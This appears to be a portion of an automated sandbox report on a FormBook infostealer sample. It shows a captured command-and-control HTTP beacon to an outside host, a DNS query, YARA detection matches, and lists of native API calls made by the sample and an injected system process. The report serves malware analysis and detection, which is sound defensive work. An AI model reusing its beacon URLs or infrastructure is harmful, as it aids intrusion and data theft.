          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1Host: www.thesixteenthround.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.biehnrecords.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 08:49:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 6d 72 61 63 6b 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.pmrack.com Port 80</address></body></html>
          Source: wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmpString found in binary or memory: http://browsehappy.com/
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmpString found in binary or memory: http://produkte.web.de/homepage-und-mail/homepage-parken/
          Source: explorer.exe, 00000005.00000002.955671038.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004181CA NtCreateFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004182FA NtClose,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AAB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AAA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AAAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9560 NtWriteFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AAA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AAA770 NtOpenThread,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_00418300 NtClose,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004181CA NtCreateFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004182FA NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_008681D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00868280 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_008683B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00868300 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_008681CA NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_008682FA NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086827A NtReadFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004046C3
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004060D9
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004068B0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041B869
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041C07B
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041C804
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00401174
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041B985
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041CB98
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00408C6B
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00408C70
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00408C2B
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041B4B3
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041C58E
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041BE99
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041CF43
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041CF0C
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041BFD4
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041CFA2
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A920A0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B320A8
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7B090
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21002
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A84120
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6F900
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9EBB0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7841F
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92581
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7D5E0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A60D20
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B31D55
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A86E30
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041B869
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041C07B
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041C804
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_00401030
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_00401174
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041B985
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041CB98
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03152B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BEBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314DBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031403DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031522AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A4120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03141002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0315E824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B20A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031520A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031528EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0315DFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03151FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314D616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A6E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03152EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03152D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03080D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03151D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2581
